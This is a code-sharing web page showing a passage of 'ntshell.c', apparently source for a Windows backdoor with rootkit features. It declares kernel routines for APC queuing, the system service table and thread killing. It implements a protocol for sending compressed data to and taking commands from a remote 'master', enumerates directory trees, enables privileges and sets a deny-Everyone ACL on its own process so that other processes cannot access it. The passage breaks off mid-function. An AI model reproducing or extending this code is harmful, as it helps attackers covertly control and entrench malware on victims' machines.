📄 ntshell.c
字号:
IN SIZE_T NumberOfBytes,
IN ULONG Tag
);
VOID
(NTAPI *pfnExFreePool)(
IN PVOID P
);
PKTHREAD
(NTAPI *pfnKeGetCurrentThread)(
);
VOID
(NTAPI *pfnKeInitializeApc)(
IN PRKAPC Apc,
IN PRKTHREAD Thread,
IN KAPC_ENVIRONMENT Environment,
IN PKKERNEL_ROUTINE KernelRoutine,
IN PKRUNDOWN_ROUTINE RundownRoutine OPTIONAL,
IN PKNORMAL_ROUTINE NormalRoutine OPTIONAL,
IN KPROCESSOR_MODE ProcessorMode OPTIONAL,
IN PVOID NormalContext OPTIONAL
);
BOOLEAN
(NTAPI *pfnKeInsertQueueApc)(
IN PRKAPC Apc,
IN PVOID SystemArgument1,
IN PVOID SystemArgument2,
IN LONG Increment
);
BOOLEAN
(NTAPI *pfnPsGetVersion)(
PULONG MajorVersion OPTIONAL,
PULONG MinorVersion OPTIONAL,
PULONG BuildNumber OPTIONAL,
PUNICODE_STRING CSDVersion OPTIONAL
);
HANDLE
(NTAPI *pfnPsGetCurrentProcessId)(
);
NTSTATUS
(NTAPI *pfnPsLookupThreadByThreadId)(
IN PVOID UniqueThreadId,
OUT PETHREAD *Thread
);
NTSTATUS
(NTAPI *pfnPsTerminateSystemThread)(
IN NTSTATUS ExitStatus
);
NTSTATUS
(NTAPI *pfnZwClose)(
IN HANDLE Handle
);
NTSTATUS
(NTAPI*pfnZwCreateFile)(
OUT PHANDLE FileHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PLARGE_INTEGER AllocationSize OPTIONAL,
IN ULONG FileAttributes,
IN ULONG ShareAccess,
IN ULONG CreateDisposition,
IN ULONG CreateOptions,
IN PVOID EaBuffer OPTIONAL,
IN ULONG EaLength
);
POBJECT_TYPE *pobPsThreadType;
PServiceDescriptorTableEntry *pobKeServiceDescriptorTable;
ULONG *pobNtBuildNumber;
POBJECT_TYPE *pobIoFileObjectType;
BOOL APIENTRY DllMain(HANDLE, DWORD, LPVOID);
VOID APIENTRY EntryPoint();
void RecordToFile(PCHAR lpName, LPVOID lpBuffer, ULONG nLength);
NTSTATUS Ring0Call(IN PRING0_ROUTINE Ring0Routine, IN PVOID Ring0Argument);
NTSTATUS Ring0KillThread(IN PRING0_KILLTHREAD ThreadArgument);
NTSTATUS Ring0OpenFile(IN OUT PRING0_OPENFILE FileArgument);
BOOLEAN EnumAllThreads(IN ULONG UniqueProcessId, OUT PRING0_KILLTHREAD ThreadId);
#ifdef _DEBUG
void PrintDebugString(PCHAR pFormat, ...)
{
CHAR info[1024];
va_list pArg;
va_start(pArg, pFormat);
vsprintf(info, pFormat, pArg);
va_end(pArg);
OutputDebugString(info);
}
#define DbgPrint(_string) PrintDebugString _string
#else
#define DbgPrint(_string)
#endif
#ifdef _DEBUG
#define BREAKPOINT __try {__asm int 3} __except (EXCEPTION_EXECUTE_HANDLER) {}
#else
#define BREAKPOINT
#endif
void LogEvent(int iFormat, ...)
{
static HANDLE log = INVALID_HANDLE_VALUE;
CHAR info[1024];
SYSTEMTIME stime;
va_list pArg;
ULONG length, temp;
PCHAR pFormat;
if (!(ConfigFlags & FLAG_RECORD_ERROR))
return;
pFormat = FormatString[iFormat];
if (log == INVALID_HANDLE_VALUE)
{
GetWindowsDirectory(info, 500);
strcat(info, "\\ntshell.log");
log = CreateFile( info,
GENERIC_WRITE | GENERIC_READ,
FILE_SHARE_READ,
NULL,
OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (log == INVALID_HANDLE_VALUE)
return;
SetFilePointer(log, GetFileSize(log, NULL), NULL, FILE_BEGIN); //添加记录
}
GetLocalTime(&stime);
length = sprintf( info,
"[%02d/%02d/%02d,%02d:%02d:%02d] EventId:%04d ",
stime.wMonth,
stime.wDay,
stime.wYear,
stime.wHour,
stime.wMinute,
stime.wSecond,
iFormat);
WriteFile(log, info, length, &temp, NULL); //记录时间
va_start(pArg, iFormat);
length = vsprintf(info, pFormat, pArg);
va_end(pArg);
WriteFile(log, info, length, &temp, NULL); //记录事件内容
WriteFile(log, "\r\n", 2, &temp, NULL); //回车换行
}
void SendToClient(SOCKET s, char *str)
{
TCHAR info[300];
sprintf(info, " %s\r\n", str);
send(s, info, strlen(info), 0);
}
int SendToMaster(SOCKET master_sock, char *buffer, int length)
{
struct sockaddr_in name;
int namelen = sizeof(name);
int i, ret;
PACK_TYPE_1 pack;
pack.dwPackType = 0;
pack.nPackSize = length;
for (i = 0; i < sizeof(PACK_TYPE_1); i += ret)
{
ret = send(master_sock, (char *)&pack + i, sizeof(PACK_TYPE_1) - i, 0);
if (ret == SOCKET_ERROR)
{
getpeername(master_sock, (struct sockaddr *)&name, &namelen);
LogEvent(1, inet_ntoa(name.sin_addr));
return -1;
}
}
for (i = 0; i < length; i += ret)
{
ret = send(master_sock, buffer + i, length - i, 0);
if (ret == SOCKET_ERROR)
{
getpeername(master_sock, (struct sockaddr *)&name, &namelen);
LogEvent(1, inet_ntoa(name.sin_addr));
return -1;
}
}
return length;
}
int RecvFromMaster(SOCKET master_sock, char **buffer, int length)
{
struct sockaddr_in name;
int namelen = sizeof(name);
int i, ret;
PACK_TYPE_1 pack;
for (i = 0; i < sizeof(PACK_TYPE_1); i += ret)
{
ret = recv(master_sock, (char *)&pack + i, sizeof(PACK_TYPE_1) - i, 0);
if (ret == SOCKET_ERROR)
{
getpeername(master_sock, (struct sockaddr *)&name, &namelen);
LogEvent(2, inet_ntoa(name.sin_addr));
return -1;
}
if (ret == 0)
{
getpeername(master_sock, (struct sockaddr *)&name, &namelen);
LogEvent(3, inet_ntoa(name.sin_addr));
return -1;
}
}
if (pack.dwPackType != 0)
{
getpeername(master_sock, (struct sockaddr *)&name, &namelen);
LogEvent(23, inet_ntoa(name.sin_addr));
return -1;
}
if (length == -1)
{
length = pack.nPackSize;
*buffer = HeapAlloc(GetProcessHeap(), 0, pack.nPackSize);
if (*buffer == NULL)
return -1;
}
if ((int)pack.nPackSize > length)
{
getpeername(master_sock, (struct sockaddr *)&name, &namelen);
LogEvent(4, inet_ntoa(name.sin_addr));
return -1;
}
for (i = 0; i < (int)pack.nPackSize; i += ret)
{
ret = recv(master_sock, *buffer + i, pack.nPackSize - i, 0);
if (ret == SOCKET_ERROR)
{
getpeername(master_sock, (struct sockaddr *)&name, &namelen);
LogEvent(2, inet_ntoa(name.sin_addr));
return -1;
}
if (ret == 0)
{
getpeername(master_sock, (struct sockaddr *)&name, &namelen);
LogEvent(3, inet_ntoa(name.sin_addr));
return -1;
}
}
return pack.nPackSize;
}
int RecvFromMaster1(SOCKET master_sock, char *buffer, int length)
{
char *p = buffer;
return RecvFromMaster(master_sock, &p, length);
}
int CompressAndSendPack(SOCKET master_sock, PVOID buffer, DWORD length)
{
PPACK_TYPE_2 pack = (PPACK_TYPE_2)HeapAlloc(GetProcessHeap(), 0, length + length / 8 + sizeof(PACK_TYPE_2));
int i, l, ret;
if (pack == NULL)
return -1;
pack->dwPackType = 1;
pack->bCompressed = TRUE;
pack->bEncrypted = FALSE;
pack->nOriginalSize = length;
pack->nPackSize = Lz77Compress(pack->bPackData, buffer, length, 2);
pack->dwCrc32 = crc32(0, pack->bPackData, pack->nPackSize);
l = pack->nPackSize + sizeof(PACK_TYPE_2);
for (i = 0; i < l; i += ret)
{
ret = send(master_sock, ((char *)pack) + i, l - i, 0);
if (ret == SOCKET_ERROR)
{
return -1;
}
}
//RecordToFile("C:\\send.bin", pack, l);
HeapFree(GetProcessHeap(), 0, pack);
return 0;
}
/*
VOID EnumDirectoryTree(LPTSTR Path, PENUMFILE_CALLBACK CallbackRoutine, PVOID CallbackArgument)
{
WIN32_FIND_DATA wfd;
TCHAR szFullPath[MAX_PATH];
HANDLE hFindStack[256];
LPTSTR pPathStack[256];
DWORD depth = 0;
strcpy(szFullPath, Path);
pPathStack[depth] = strchr(szFullPath, '\\');
if (pPathStack[depth] == NULL || pPathStack[depth][1] != '\0')
strcat(szFullPath, "\\");
pPathStack[depth] = strrchr(szFullPath, '\\') + 1;
for (;;)
{
SearchDirectory:
strcpy(pPathStack[depth], "*.*"); //枚举全部文件
hFindStack[depth] = FindFirstFile(szFullPath, &wfd);
pPathStack[depth][0] = '\0';
if (hFindStack[depth] != INVALID_HANDLE_VALUE)
{
do
{
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
if (!strcmp(wfd.cFileName, ".") || !strcmp(wfd.cFileName, "..")) //忽略当前目录和上一级目录
continue;
strcpy(pPathStack[depth], wfd.cFileName); //枚举下一级目录
strcat(pPathStack[depth], "\\");
depth++;
pPathStack[depth] = strrchr(szFullPath, '\\') + 1;
goto SearchDirectory;
}
if (!CallbackRoutine(szFullPath, &wfd, CallbackArgument)) //返回文件给调用者
{
do
{
FindClose(hFindStack[depth]); //不继续查找,释放资源并退出
} while (depth--);
return;
}
ReSearchDirectory:
;
} while (FindNextFile(hFindStack[depth], &wfd));
FindClose(hFindStack[depth]);
}
if (depth == 0)
break;
depth--; //后退到上一级目录
pPathStack[depth] = '\0';
goto ReSearchDirectory;
}
}//*/
BOOLEAN EnumDirectoryTree(LPTSTR Path, PENUMFILE_CALLBACK CallbackRoutine, PVOID CallbackArgument)
{
WIN32_FIND_DATA wfd;
TCHAR szFullPath[MAX_PATH];
HANDLE hFind;
LPTSTR pPath;
BOOLEAN bContinue;
strcpy(szFullPath, Path);
pPath = strchr(szFullPath, '\\');
if (pPath == NULL || pPath[1] != '\0')
strcat(szFullPath, "\\*.*");
else
strcat(szFullPath, "*.*");
pPath = strrchr(szFullPath, '\\') + 1;
hFind = FindFirstFile(szFullPath, &wfd);
pPath[0] = '\0';
if (hFind != INVALID_HANDLE_VALUE)
{
do
{
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
if (!strcmp(wfd.cFileName, ".") || !strcmp(wfd.cFileName, "..")) //忽略当前目录和上一级目录
continue;
strcpy(pPath, wfd.cFileName);
EnumDirectoryTree(szFullPath, CallbackRoutine, CallbackArgument); //枚举下一级目录
pPath[0] = '\0';
}
bContinue = CallbackRoutine(szFullPath, &wfd, CallbackArgument); //返回文件给调用者
if (!bContinue)
break;
} while (FindNextFile(hFind, &wfd));
FindClose(hFind);
}
return bContinue;
}
//调整当前进程特权
BOOL EnablePrivilege(LPCTSTR lpPrivilegeName, BOOL bEnable)
{
HANDLE hToken;
BOOL bResult;
TOKEN_PRIVILEGES tp;
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;
bResult = LookupPrivilegeValue(NULL, lpPrivilegeName, &tp.Privileges[0].Luid);
if (bResult == FALSE)
{
return FALSE;
}
bResult = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken);
if (bResult == FALSE)
{
return FALSE;
}
bResult = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
CloseHandle(hToken);
return bResult;
}
//调整当前进程的访问控制列表,禁止外部进程访问
BOOL ModifyProcessAcl()
{
SID_IDENTIFIER_AUTHORITY sia = SECURITY_WORLD_SID_AUTHORITY;
PSID pSid = NULL;
HANDLE hToken = NULL;
DWORD dwReturnLength;
LPVOID pTokenInformation = NULL;
PTOKEN_USER pTokenUser;
DWORD cbAcl;
PACL pAcl = NULL;
BOOL bResult = FALSE;
if (!AllocateAndInitializeSid(&sia, 1, 0, 0, 0, 0, 0, 0, 0, 0, &pSid)) //取得 Everyone 的SID
return FALSE;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
goto Cleanup;
GetTokenInformation(hToken, TokenUser, NULL, 0, &dwReturnLength);
pTokenInformation = LocalAlloc(LPTR, dwReturnLength);
if (pTokenInformation == NULL)
goto Cleanup;
if (!GetTokenInformation(hToken, TokenUser, pTokenInformation, dwReturnLength, &dwReturnLength))
goto Cleanup;
pTokenUser = (PTOKEN_USER)pTokenInformation;
cbAcl = sizeof(ACL) + 7 * (sizeof(ACCESS_DENIED_ACE) - sizeof(DWORD)) + GetLengthSid(pSid);
pAcl = LocalAlloc(LPTR, cbAcl);
if (pAcl == NULL)
goto Cleanup;
if (!InitializeAcl(pAcl, cbAcl, ACL_REVISION)) //初始化一个空的ACL
goto Cleanup;
if (!AddAccessDeniedAce(pAcl, ACL_REVISION, -1, pSid)) //拒绝 Everyone 全部权限
goto Cleanup;
// if (!AddAccessAllowedAce(pAcl, ACL_REVISION, 0, pTokenUser->User.Sid))
// goto Cleanup;
if (SetSecurityInfo( GetCurrentProcess(),
SE_KERNEL_OBJECT,
DACL_SECURITY_INFORMATION | 0x80000000L, //PROTECTED_DACL_SECURITY_INFORMATION
NULL,
NULL,
pAcl,
NULL) == ERROR_SUCCESS) //修改进程ACL
{
bResult = TRUE;
}
Cleanup:
if (pAcl != NULL)
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -